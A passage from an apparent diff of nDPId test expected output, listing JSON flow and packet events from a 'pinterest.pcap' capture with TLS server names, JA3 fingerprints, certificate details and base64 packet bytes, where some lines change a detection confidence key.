09a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714658,"flow_last_seen":1605289714698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":575,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714658,"flow_last_seen":1605289714739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289714739,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":583,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1605289714658,"flow_last_seen":1605289714740,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":411,"midstream":0,"thread_ts_msec":1605289714740,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} 00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714782,"flow_last_seen":1605289714782,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714782,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1605289714782,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714782,"pkt":"qtsDr8lk5EKm5WPyht1gCp8uACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3toBu85LuqIAAAAAoAL9IEOtAAACBAWgBAIICnRgZN4AAAAAAQMDBw=="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1605289714832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714832,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAByAqAcsBIEmLB5kd7IUo3\/YpAbve2qyyOFrOS7qjoBJXgB0bAAACBAV4AQMDAwQCCArCuSSHdGBk3g=="} 
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1605289714832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714832,"pkt":"qtsDr8lk5EKm5WPyht1gCp8uACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3toBu85LuqOssjhbgBAB+6D6AAABAQgKdGBlEMK5JIc="} -00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714782,"flow_last_seen":1605289714833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714833,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":870,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714782,"flow_last_seen":1605289714867,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289714867,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -03219{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":876,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289714782,"flow_last_seen":1605289714869,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6069,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1605289714869,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","server_names":"imgix2.map.fastly.net,*.camp-fire.jp,*.carwow.co.uk,*.carwow.de,*.carwow.es,*.catchandrelease.com,*.dorothee-schumacher.com,*.footway.com,*.img-ikyu.com,*.imgix.drizly.com,*.instamotor.com,*.microdinc.com,*.msastaging.com,*.peddle.com,*.remax.ca,*.ustudio.com,*.vaping360.com,*.weber.com,article-image-ix.nikkei.com,assets.eberhardt-travel.de,assets.verishop.com,assets.verishop.xyz,cdn.airstream.com,cdn.elementthree.com,cdn.hashnode.com,cdn.naturalhealthyconcepts.com,cdn.parent.eu,cdn.phonehouse.es,cdn.shiplus.co.il,i.drop-cdn.com,i.upworthy.com,image.volunteerworld.com,imageproxy.themaven.net,images-dev.takeshape.io,images.101cookbooks.com,images.beano.com,images.businessoffashion.com,images.congstar.de,images.diesdas.digital,images.fandor.com,images.greetingsisland.com,images.malaecuia.com.br,images.omaze.com,images.roulottesgagnon.com,images.takeshape.io,images.thewanderful.co,images.unsplash.com,images.victoriaplum.com,images.vraiandoro.com,img-1.homely.com.au,img-stack.imagereflow.com,img.badshop.se,img.bernieandphyls.com,img.bioopticsworld.com,img.broadbandtechreport.com,img.broadwaybox.com,img.bygghemma.se,img.bygghjemme.no,img.byggshop.se,img.cablinginstall.com,img.dentaleconomics.com,img.dentistryiq.com,img.evaluationengineering.com,img.golvshop.se,img.grudado.com.br,img.industrial-lasers.com,img.induux.de,img.intelligent-aerospace.com,img.inturn.co,img.laserfocusworld.com,img.ledsmagazine.com,img.lightwaveonline.com,img.militaryaerospace.com,img.mychannels.video,img.officer.com,img.offshore-mag.com,img.ogj.com,img.perioimplantadvisory.com,img.plasticsmachinerymagazine.com,img.prevu.com,img.rdhmag.com,img.speedcurve.com,img.strategies-u.com,img.utilityproducts.com,img.vision-systems.com,img.waterworld.com,img.workbook.com,img.xlhemma.se,img1.nowpurchase.com,iw.induux.de,m.22slides.com,media.sailrace.com,media.useyourlocal.com,pictures.hideaways.dk,raven.contrado.com,reso
urces.intuitive.com,static.doorsuperstore.co.uk","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=imgix2.map.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1F:BC:A1:79:48:96:70:32:B8:08:C1:38:D4:20:12:BE:D9:6F:14:B6"}} +00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714782,"flow_last_seen":1605289714833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714833,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":870,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714782,"flow_last_seen":1605289714867,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289714867,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +03219{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":876,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289714782,"flow_last_seen":1605289714869,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6069,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1605289714869,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","server_names":"imgix2.map.fastly.net,*.camp-fire.jp,*.carwow.co.uk,*.carwow.de,*.carwow.es,*.catchandrelease.com,*.dorothee-schumacher.com,*.footway.com,*.img-ikyu.com,*.imgix.drizly.com,*.instamotor.com,*.microdinc.com,*.msastaging.com,*.peddle.com,*.remax.ca,*.ustudio.com,*.vaping360.com,*.weber.com,article-image-ix.nikkei.com,assets.eberhardt-travel.de,assets.verishop.com,assets.verishop.xyz,cdn.airstream.com,cdn.elementthree.com,cdn.hashnode.com,cdn.naturalhealthyconcepts.com,cdn.parent.eu,cdn.phonehouse.es,cdn.shiplus.co.il,i.drop-cdn.com,i.upworthy.com,image.volunteerworld.com,imageproxy.themaven.net,images-dev.takeshape.io,images.101cookbooks.com,images.beano.com,images.businessoffashion.com,images.congstar.de,images.diesdas.digital,images.fandor.com,images.greetingsisland.com,images.malaecuia.com.br,images.omaze.com,images.roulottesgagnon.com,images.takeshape.io,images.thewanderful.co,images.unsplash.com,images.victoriaplum.com,images.vraiandoro.com,img-1.homely.com.au,img-stack.imagereflow.com,img.badshop.se,img.bernieandphyls.com,img.bioopticsworld.com,img.broadbandtechreport.com,img.broadwaybox.com,img.bygghemma.se,img.bygghjemme.no,img.byggshop.se,img.cablinginstall.com,img.dentaleconomics.com,img.dentistryiq.com,img.evaluationengineering.com,img.golvshop.se,img.grudado.com.br,img.industrial-lasers.com,img.induux.de,img.intelligent-aerospace.com,img.inturn.co,img.laserfocusworld.com,img.ledsmagazine.com,img.lightwaveonline.com,img.militaryaerospace.com,img.mychannels.video,img.officer.com,img.offshore-mag.com,img.ogj.com,img.perioimplantadvisory.com,img.plasticsmachinerymagazine.com,img.prevu.com,img.rdhmag.com,img.speedcurve.com,img.strategies-u.com,img.utilityproducts.com,img.vision-systems.com,img.waterworld.com,img.workbook.com,img.xlhemma.se,img1.nowpurchase.com,iw.induux.de,m.22slides.com,media.sailrace.com,media.useyourlocal.com,pictures.hideaways.dk,raven.contrado.com,reso
urces.intuitive.com,static.doorsuperstore.co.uk","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=imgix2.map.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1F:BC:A1:79:48:96:70:32:B8:08:C1:38:D4:20:12:BE:D9:6F:14:B6"}} 00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2206,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715133,"flow_last_seen":1605289715133,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715133,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2206,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1605289715133,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715133,"pkt":"qtsDr8lk5EKm5WPyht1gAUyOACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyX4Bu+HPmfcAAAAAoAL9IJHxAAACBAWgBAIICjiITggAAAAAAQMDBw=="} 
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2778,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1605289715210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715210,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbvJfoEpGV7hz5n4oBJXgLSTAAACBAV4AQMDAwQCCArCuSXYOIhOCA=="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2781,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1605289715210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715210,"pkt":"qtsDr8lk5EKm5WPyht1gAUyOACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACADyX4Bu+HPmfiBKRlfgBAB+zhYAAABAQgKOIhOVcK5Jdg="} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2792,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715133,"flow_last_seen":1605289715212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2792,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715133,"flow_last_seen":1605289715212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2896,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715221,"flow_last_seen":1605289715221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289715221,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2896,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1605289715221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715221,"pkt":"qtsDr8lk5EKm5WPyht1gDRmqACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1JABu7b0CzwAAAAAoAL9ILgWAAACBAWgBAIICnB0noAAAAAAAQMDBw=="} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3385,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1605289715273,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289715273,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvUkNYqBSe29As9oBJXgJmfAAACBAV4AQMDAwQCCArCuSYncHSegA=="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3387,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1605289715273,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289715273,"pkt":"qtsDr8lk5EKm5WPyht1gDRmqACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1JABu7b0Cz3WKgUogBAB+x19AAABAQgKcHSetMK5Jic="} 
-00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3394,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715221,"flow_last_seen":1605289715274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3394,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715221,"flow_last_seen":1605289715274,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289715274,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
